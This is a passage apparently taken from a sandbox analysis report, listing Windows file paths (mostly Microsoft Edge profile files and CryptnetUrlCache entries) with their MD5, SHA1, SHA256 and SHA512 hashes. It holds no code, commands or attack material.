| SHA512 | 70846ba1d1308dd2607be49af0871211f4bf7eee0217ceb4e948629cc7d5afefb2ce8a010af52549c93d33c54414403fa7afe7d5a1643d4d1b12b724a21b14cb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | fd63f234072a908eb86fb55d1a3bd0fe |
| SHA1 | 75650f576d029d8ae6e466acea94820360d13b64 |
| SHA256 | ce2cc2719ba6b15f53eb2a4b253b8a405790a7ce037da2d02df95a1101b4c639 |
| SHA512 | c9fa05d17e0ad66a1d285cd508d0e5400f294598b6c9668cc6178226f3c0d0c544a8d18bb5937aef22ac19005b012796a51e9c8ae05f6335ae26afc6e7851349 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e79bbf485050bc13787cfbb167f09207 |
| SHA1 | 1e630cdb6e3993e37ed225e5fa14ea0e4e1f0271 |
| SHA256 | 1b281fddab3038278b0c52ca1fb950bb710688d97be302bbcc5ce8049b27f6e3 |
| SHA512 | fb7efcd5926e34f03c4b3b2a8e8ed210c64256cea3587c907823a49b0449d5f6c9beca52afb367b81c540ff5d767ce3ace5911a63ed16a3b024de29d74a81aa5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 504e86efa22eea8edac2c3a2735325b5 |
| SHA1 | dd7a599429c27a8c9decd95eab2dac4297da31c3 |
| SHA256 | 560bf3e6be9f62f95ac620a2f36567405419bdceba6a80241f40cb5f0daa9339 |
| SHA512 | 782f83797d432dc5d0875f639ad2d1f090fc1c6d293ce72c974d40e26e922b0daff08713dd69dd84f071d33ff81cf875478af91cdfc58acb0a8add104e76b7db |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F59A01A8B782D93EA6991BC172CEFFB1
| MD5 | 1d8f6f14289e73ecc4ab4d24ed89f314 |
| SHA1 | 4e7d0656f614a40d155c7e28bd4fd42b930351e0 |
| SHA256 | 2a9190d84198c324e26d76665a37ca910f358ccca9a9f1ec185113095e74f9c5 |
| SHA512 | 14520cbdbb7040b53d03387e8f175757c7f274b42bafd3af19b472ec06c812437cabcd22ca454780c764f69ab3dc6c31dfa979e55ef6afcc8b4afbcb12e89251 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619
| MD5 | 88685024cd87ff04e9f90fecdd07a86a |
| SHA1 | 551e63af0270d789d4a07f7660523c5fbdfc7f75 |
| SHA256 | 0f1e70b76b0ede33e2466ab0e94d8d6712db6776d725243749185d9cb9c08862 |
| SHA512 | 3e7ba67de4be1e4e6ddc624a7c5cc69c7030f3ef8333a4d1464ff118f08777bfdce68eb2bf038b83f1631edd8be18e320a5854c06bc8d3e8e4bed0122f34e2bd |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
| MD5 | af9c3bea2e7cabad2440c6859d02fe56 |
| SHA1 | 5b43d27db53f3c0150feebe35096151962a3d9e3 |
| SHA256 | 1bf827fc072b09101ea001847d8c6dd04bb293ef5a0887c60d2f28e4b6e193cf |
| SHA512 | 6ec7d2f7936c573af7c0dad1482bfa3efcc85d8f99c71e814e263d4d437af71f75f70cf56ae36087dca76d8b4c767aca79f2963e54c19fa31f7055fae198877b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
| MD5 | 9bcb47de41de2e83e0cac07c0c973819 |
| SHA1 | f46d67bf177c408304b7821c2c18d736a3f714f0 |
| SHA256 | e5f7de4f04e0f5ef9f1174caf0f68cca403c350414a1343f779d771d56107b1f |
| SHA512 | 0955d76dfea7f9396148022e1766e5b54778049815aeccd7ad6451cc647a3078c45f208faeb548788f3aae12ac66a32c9979472b1e5e8fbb0efe4f0ef3e0c527 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\070E0202839D9D67350CD2613E78E416
| MD5 | 6349022b4ad9fcc551f2e6e405adb429 |
| SHA1 | e6e6d0677f70123e4d2551f73dc1df3ada9dae86 |
| SHA256 | b019bc822276bd4c1ef2f94ac1ce570ffda2ee40f35153ed218c92d9d12c1786 |
| SHA512 | 55e3c8b0a694462286a62da7d923f1d9cecfc0c2e623ace66f82434ed98fe86f3e6d02e2b868bd43e114285a7455e92fdb393a941c679837c9b569467ea5fa14 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 605c6e6ca33357f48d1e32a0a0dfa783 |
| SHA1 | 38a9b0faef62221dab3dcaafa490a2d385346e51 |
| SHA256 | f50428ebfec008f30d544bcd733679ac80ab9d0b07a4219e2597ecb52d41db01 |
| SHA512 | f95eec5ea6e58c21fb607c283d6e9cfc1f48620371ff044d2aa689537606c757c661abe3fa0d01caa4ef03de92c545d8eacd341525f2417bcbb96baa6924b5da |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 81dfa595d40efe351c6eb4affc347aed |
| SHA1 | 97900b613846dd34c131633fffee602ea3018e0c |
| SHA256 | 30a21b578fb01d793e4bc29ba4ff2702bb6e784986566a27f80ec0d77787f022 |
| SHA512 | 142da5b924807fb2f3fda9ad71f70cf780da3e8e78332fb70c59f77ff96fd5ad3551fb8a3c21fbc7f6c6abf9135974462e60e7b98046ad3eaf13adf4416e4e53 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | a7ec9125943d06fc4c75cc1e306c944c |
| SHA1 | 5c6e0c5ccd69e39bb5b3fe65160a49adfa1173c4 |
| SHA256 | 81b2ebd5acac360fea4f59e64b37e0b0603fae1026102a9a2e1c488c649ff6e0 |
| SHA512 | ee1ec82fe82c286ed30ab965b2bbe444d5d8c5db954b27c45018645a59c870d3ac290377dafe5bc83b0ed59b0d3a32292753c8789d3220c913644c2a8022afdb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | a0d0957c0806bdfbc8cade16052c6b14 |
| SHA1 | 2464da47d71051f3c5c742054429b72831110fa6 |
| SHA256 | 670a720c2335b6c85d3ced16d5d66291dc57edddac65eec2e97008ef3c4a67a7 |
| SHA512 | fe9eed238ea36c91f18ab9e2456934b732ecd02a3a8f50b92f2ca954f8e9605f4773537a2bb0e8b372609bec36c9ab362a9bf7397f517eac22d77b38e653c93e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | ce87a38d84d7a8f4679ee4756d519499 |
| SHA1 | 3e5efeff8c2025a303656b86182ec2eef2c299dc |
| SHA256 | 6842e16517d8cb6ffbe27a873c316f149f7fc3d033007739e532d6f5e0a05a99 |
| SHA512 | ee8195fdf4b6f9d19fd751da0fa6e02013c98bfb1891d71357bb14a02efd1caf3f1091d097ae900bad11793e0f10a7dc3bc73e532f8c5e1fd25727122052aa45 |
C:\Windows\INF\netrasa.PNF
| MD5 | be80e300446111aec64403d79f1273fe |
| SHA1 | 826037ffd3b2a6fefafd518fcd46b874048e570a |
| SHA256 | b3c3bcc6efcde0eb14c4bed7d0a51635384a5a33f6b9c3ffd97efec28a824798 |
| SHA512 | e67f7c010e3d71e2753e6a2c1b977b0acb54c0657e269baedab7d25c2e14371855d3fbe48daeb8aa5ef71c43e161f2857a695f24b736426c4c8de598e9f95459 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 51645e8814ccaa19adf3199e22ee8a30 |
| SHA1 | db02e26107fc3a34ed620735f0961d583c299a76 |
| SHA256 | 6343df4c7eef516c65d5cdfa2b57cdc62849dff485338b2179a91d7c38aa4d09 |
| SHA512 | 4b056eac811918eb30b1863b8c09a92df1b83616f9e52e2bfb5580d5efc04099597735ddb77858ee88e371f45f83b5e8f4817416f5396988aa94415151304aba |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 37ca8dc2d35d804e9bbfdc17ef1166b4 |
| SHA1 | 585a61e668ef8df70851e7c6e187fa1bdf203fbd |
| SHA256 | 1589c9134d5edb7ecfda97fa3f688d9ca5911c6df30da3c592736f66cfd150d4 |
| SHA512 | 3d6f5734991b64204a966933ffdd5dfda665ae68ac94b72bcd8a3010fa716986a626c320aba9279224c559f9e607146564bfd39f1d6163e9303bdda331daba1b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
| MD5 | 7614ef6c7bbae12ac07d02d62356a5ad |
| SHA1 | 5c68c7f015221f77feaa264c929ab239a2a749d6 |
| SHA256 | 186e855b939de9f4f636d897d5414e552e1cfab15f3aefb3bba262d799ffaa61 |
| SHA512 | 389c05fefb3af406994f983e93d09db449277c09c7ee577dec771858e843bd9a225bf2add38c3a52799fe35c01efb9a7676895005748a94486bc6fca0e879997 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
| MD5 | 6cb8c22687ab2c915156b98e2abea95f |
| SHA1 | f41c15ddeb3dc39aa620ff0c9e003123a83d1db2 |
| SHA256 | e08a58e62b12a0047815bb074f8fb8b9a3cb140432e1e7d45d7904f3039e986d |
| SHA512 | 7f763ef6ab9f4ef2cf9b125f5040b85a2d1fd205000c5f44520a3182b49cd0d3377df58f90e5eb340bd5d64cd49e1b910a97c5bfae8429a11ab28057a36cd305 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
| MD5 | 6387f9645b0e7fd5985664ad93d02f2f |
| SHA1 | 1b1a57eeae38410b66f90c0fda39b68491b37459 |
| SHA256 | 7ffc84bbe13d258753b8b0068980ee356077bf255929a5b554e6e3d69ff73aa2 |
| SHA512 | 825e289c6eb65bdf53068bcbe8d35ab57f25203b25776859fdbf02482607846ec966f5b93a365079519d3fbc593eec435c7384caff83e8045549546bfd11648c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
| MD5 | a78885dc856faeb57c7549a4b25d6a6a |
| SHA1 | 62cd1234f65a694281b47fb54f6aeb300d023093 |
| SHA256 | d586a36a410c287a57fb08f3e0e137f7fa66a303aaa86396c72b81f6abad2c63 |
| SHA512 | f41c11f88c04a6f3c8fa528c199790ed701d4f5577820881d29d78f239d03171962942deaa8e53320d83784d77a013d243f84b8f4bcd47fb97e056a197f2093b |